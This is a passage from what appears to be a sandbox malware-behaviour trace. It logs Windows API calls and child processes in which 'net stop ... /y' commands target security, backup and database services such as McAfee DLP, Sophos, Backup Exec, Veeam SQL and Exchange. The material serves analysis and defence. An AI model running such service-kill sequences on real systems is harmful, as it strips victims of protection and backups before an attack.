(_String1="devrdr", _String2="MCAFEEDLPAGENTSERVICE") returned -9 [0104.205] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEDLPAGENTSERVICE") returned -1 [0104.205] _wcsicmp (_String1="server", _String2="MCAFEEDLPAGENTSERVICE") returned 6 [0104.205] _wcsicmp (_String1="svr", _String2="MCAFEEDLPAGENTSERVICE") returned 6 [0104.205] _wcsicmp (_String1="srv", _String2="MCAFEEDLPAGENTSERVICE") returned 6 [0104.205] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEDLPAGENTSERVICE") returned -1 [0104.205] _wcsicmp (_String1="alerter", _String2="MCAFEEDLPAGENTSERVICE") returned -12 [0104.206] _wcsicmp (_String1="netlogon", _String2="MCAFEEDLPAGENTSERVICE") returned 1 [0104.206] NetServiceControl (in: servername=0x0, service="MCAFEEDLPAGENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x29fc6c | out: bufptr=0x29fc6c) returned 0x889 [0104.207] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.207] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0104.208] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.209] GetFileType (hFile=0x0) returned 0x0 [0104.209] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6e3ef8 [0104.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6e3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nm", lpUsedDefaultChar=0x0) returned 30 [0104.209] WriteFile (in: hFile=0x0, lpBuffer=0x6e3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29fbac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fbac, lpOverlapped=0x0) returned 0 [0104.209] LocalFree (hMem=0x6e3ef8) returned 0x0 [0104.209] GetFileType (hFile=0x0) returned 0x0 [0104.209] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6e61a0 [0104.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6e61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nn", lpUsedDefaultChar=0x0) returned 2 [0104.209] WriteFile (in: hFile=0x0, lpBuffer=0x6e61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fbac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fbac, lpOverlapped=0x0) returned 0 [0104.209] LocalFree (hMem=0x6e61a0) returned 0x0 [0104.209] _ultow (in: _Dest=0x889, _Radix=2751452 | out: _Dest=0x889) returned="2185" [0104.210] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.210] GetFileType (hFile=0x0) returned 0x0 [0104.210] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6e61a0 [0104.210] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6e61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0104.210] WriteFile (in: hFile=0x0, lpBuffer=0x6e61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29fbb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fbb8, lpOverlapped=0x0) returned 0 [0104.210] LocalFree (hMem=0x6e61a0) returned 0x0 [0104.210] GetFileType (hFile=0x0) returned 0x0 [0104.210] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6e61a0 [0104.210] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6e61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nn", lpUsedDefaultChar=0x0) returned 2 [0104.210] WriteFile (in: hFile=0x0, lpBuffer=0x6e61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fbb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fbb8, lpOverlapped=0x0) returned 0 [0104.210] LocalFree (hMem=0x6e61a0) returned 0x0 [0104.211] NetApiBufferFree (Buffer=0x6e1b00) returned 0x0 [0104.211] NetApiBufferFree (Buffer=0x6e1b18) returned 0x0 [0104.211] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeDLPAgentService /y" [0104.211] exit (_Code=2) Process: id = "91" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6f054000" os_pid = "0xf80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xc9c" cmd_line = "C:\\Windows\\system32\\net1 stop MMS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 455 os_tid = 0xf84 [0103.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df954 | out: lpSystemTimeAsFileTime=0x2df954*(dwLowDateTime=0x12e580b0, dwHighDateTime=0x1d6f0d1)) [0103.276] GetCurrentProcessId () returned 0xf80 [0103.276] GetCurrentThreadId () returned 0xf84 [0103.276] GetTickCount () returned 0x114dd93 [0103.277] QueryPerformanceCounter (in: lpPerformanceCount=0x2df94c | out: lpPerformanceCount=0x2df94c*=22237762801) returned 1 [0103.277] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0103.277] __set_app_type (_Type=0x1) [0103.277] __p__fmode () returned 0x770331f4 [0103.277] __p__commode () returned 0x770331fc [0103.277] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0103.278] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0103.278] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.278] GetConsoleOutputCP () returned 0x1b5 [0103.278] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0103.278] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.281] sprintf_s (in: _DstBuf=0x2df90c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.282] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.284] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0103.284] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.284] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MMS /y" [0103.284] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2df6d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0103.284] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x5a) returned 0x473ac0 [0103.285] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.285] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df8dc | out: Buffer=0x2df8dc*=0x471ac8) returned 0x0 [0103.285] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df8dc | out: Buffer=0x2df8dc*=0x471ae0) returned 0x0 [0103.285] _fileno (_File=0x77032900) returned -2 [0103.285] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0103.285] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.285] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.285] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.285] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.285] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.285] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.285] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.285] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.285] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.285] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.285] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.286] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.286] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.286] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.286] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.286] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.286] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.286] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.286] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.286] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.286] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.286] _wcsicmp (_String1="accounts", _String2="MMS") returned -12 [0103.286] _wcsicmp (_String1="computer", _String2="MMS") returned -10 [0103.286] _wcsicmp (_String1="config", _String2="MMS") returned -10 [0103.286] _wcsicmp (_String1="continue", _String2="MMS") returned -10 [0103.286] _wcsicmp (_String1="cont", _String2="MMS") returned -10 [0103.286] _wcsicmp (_String1="file", _String2="MMS") returned -7 [0103.286] _wcsicmp (_String1="files", _String2="MMS") returned -7 [0103.286] _wcsicmp (_String1="group", _String2="MMS") returned -6 [0103.286] _wcsicmp (_String1="groups", _String2="MMS") returned -6 [0103.286] _wcsicmp (_String1="help", _String2="MMS") returned -5 [0103.286] _wcsicmp (_String1="helpmsg", _String2="MMS") returned -5 [0103.286] _wcsicmp (_String1="localgroup", _String2="MMS") returned -1 [0103.286] _wcsicmp (_String1="pause", _String2="MMS") returned 3 [0103.286] _wcsicmp (_String1="session", _String2="MMS") returned 6 [0103.286] _wcsicmp (_String1="sessions", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="sess", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="share", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="start", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="stats", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="statistics", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="stop", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="time", _String2="MMS") returned 7 [0103.287] _wcsicmp (_String1="user", _String2="MMS") returned 8 [0103.287] _wcsicmp (_String1="users", _String2="MMS") returned 8 [0103.287] _wcsicmp (_String1="msg", _String2="MMS") returned 6 [0103.287] _wcsicmp (_String1="messenger", _String2="MMS") returned -8 [0103.287] _wcsicmp (_String1="receiver", _String2="MMS") returned 5 [0103.287] _wcsicmp (_String1="rcv", _String2="MMS") returned 5 [0103.287] _wcsicmp (_String1="netpopup", _String2="MMS") returned 1 [0103.287] _wcsicmp (_String1="redirector", _String2="MMS") returned 5 [0103.287] _wcsicmp (_String1="redir", _String2="MMS") returned 5 [0103.287] _wcsicmp (_String1="rdr", _String2="MMS") returned 5 [0103.287] _wcsicmp (_String1="workstation", _String2="MMS") returned 10 [0103.287] _wcsicmp (_String1="work", _String2="MMS") returned 10 [0103.287] _wcsicmp (_String1="wksta", _String2="MMS") returned 10 [0103.287] _wcsicmp (_String1="prdr", _String2="MMS") returned 3 [0103.287] _wcsicmp (_String1="devrdr", _String2="MMS") returned -9 [0103.287] _wcsicmp (_String1="lanmanworkstation", _String2="MMS") returned -1 [0103.287] _wcsicmp (_String1="server", _String2="MMS") returned 6 [0103.288] _wcsicmp (_String1="svr", _String2="MMS") returned 6 [0103.288] _wcsicmp (_String1="srv", _String2="MMS") returned 6 [0103.288] _wcsicmp (_String1="lanmanserver", _String2="MMS") returned -1 [0103.288] _wcsicmp (_String1="alerter", _String2="MMS") returned -12 [0103.288] _wcsicmp (_String1="netlogon", _String2="MMS") returned 1 [0103.288] _wcsupr (in: _String="MMS" | out: _String="MMS") returned="MMS" [0103.288] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x475488 [0103.862] GetServiceKeyNameW (in: hSCManager=0x475488, lpDisplayName="MMS", lpServiceName=0x3faaf0, lpcchBuffer=0x2df878 | out: lpServiceName="", lpcchBuffer=0x2df878) returned 0 [0103.863] _wcsicmp (_String1="msg", _String2="MMS") returned 6 [0103.863] _wcsicmp (_String1="messenger", _String2="MMS") returned -8 [0103.863] _wcsicmp (_String1="receiver", _String2="MMS") returned 5 [0103.863] _wcsicmp (_String1="rcv", _String2="MMS") returned 5 [0103.863] _wcsicmp (_String1="redirector", _String2="MMS") returned 5 [0103.863] _wcsicmp (_String1="redir", _String2="MMS") returned 5 [0103.863] _wcsicmp (_String1="rdr", _String2="MMS") returned 5 [0103.863] _wcsicmp (_String1="workstation", _String2="MMS") returned 10 [0103.863] _wcsicmp (_String1="work", _String2="MMS") returned 10 [0103.863] _wcsicmp (_String1="wksta", _String2="MMS") returned 10 [0103.863] _wcsicmp (_String1="prdr", _String2="MMS") returned 3 [0103.863] _wcsicmp (_String1="devrdr", _String2="MMS") returned -9 [0103.863] _wcsicmp (_String1="lanmanworkstation", _String2="MMS") returned -1 [0103.863] _wcsicmp (_String1="server", _String2="MMS") returned 6 [0103.863] _wcsicmp (_String1="svr", _String2="MMS") returned 6 [0103.863] _wcsicmp (_String1="srv", _String2="MMS") returned 6 [0103.863] _wcsicmp (_String1="lanmanserver", _String2="MMS") returned -1 [0103.863] _wcsicmp (_String1="alerter", _String2="MMS") returned -12 [0103.863] _wcsicmp (_String1="netlogon", _String2="MMS") returned 1 [0103.863] NetServiceControl (in: servername=0x0, service="MMS", opcode=0x0, arg=0x0, bufptr=0x2df874 | out: bufptr=0x2df874) returned 0x889 [0103.864] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0103.864] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0103.865] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0103.866] GetFileType (hFile=0x0) returned 0x0 [0103.866] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x473ea0 [0103.866] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x473ea0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0103.866] WriteFile (in: hFile=0x0, lpBuffer=0x473ea0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2df7b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df7b4, lpOverlapped=0x0) returned 0 [0103.866] LocalFree (hMem=0x473ea0) returned 0x0 [0103.866] GetFileType (hFile=0x0) returned 0x0 [0103.866] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x476150 [0103.866] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x476150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nG", lpUsedDefaultChar=0x0) returned 2 [0103.866] WriteFile (in: hFile=0x0, lpBuffer=0x476150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df7b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df7b4, lpOverlapped=0x0) returned 0 [0103.866] LocalFree (hMem=0x476150) returned 0x0 [0103.866] _ultow (in: _Dest=0x889, _Radix=3012580 | out: _Dest=0x889) returned="2185" [0103.866] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0103.866] GetFileType (hFile=0x0) returned 0x0 [0103.866] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x476150 [0103.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x476150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0103.867] WriteFile (in: hFile=0x0, lpBuffer=0x476150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2df7c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df7c0, lpOverlapped=0x0) returned 0 [0103.867] LocalFree (hMem=0x476150) returned 0x0 [0103.867] GetFileType (hFile=0x0) returned 0x0 [0103.867] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x476150 [0103.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x476150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nG", lpUsedDefaultChar=0x0) returned 2 [0103.867] WriteFile (in: hFile=0x0, lpBuffer=0x476150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df7c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df7c0, lpOverlapped=0x0) returned 0 [0103.867] LocalFree (hMem=0x476150) returned 0x0 [0103.867] NetApiBufferFree (Buffer=0x471ac8) returned 0x0 [0103.867] NetApiBufferFree (Buffer=0x471ae0) returned 0x0 [0103.867] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MMS /y" [0103.867] exit (_Code=2) Process: id = "92" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x70975000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecManagementService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 457 os_tid = 0xf8c Process: id = "93" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6fd7a000" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 458 os_tid = 0xf94 Process: id = "94" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2a07f000" os_pid = "0xf98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 459 os_tid = 0xf9c Process: id = "95" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6f984000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Enterprise Client Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 460 os_tid = 0xfa4 Process: id = "96" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x28d89000" os_pid = "0xfa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “SQL Backups /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 461 os_tid = 0xfac Process: id = "97" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6fd8e000" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MsDtsServer100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 462 os_tid = 0xfb4 Process: id = "98" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x26793000" os_pid = "0xfb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop NetMsmqActivator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 463 os_tid = 0xfbc Process: id = "99" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x28d98000" os_pid = "0xfc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSExchangeIS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 464 os_tid = 0xfc4 Process: id = "100" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1f49d000" os_pid = "0xfc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos AutoUpdate Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 465 os_tid = 0xfcc Process: id = "101" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6dd35000" os_pid = "0xfd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0xca4" cmd_line = "C:\\Windows\\system32\\net1 stop ccSetMgr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 466 os_tid = 0xfd4 [0103.505] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fefc | out: 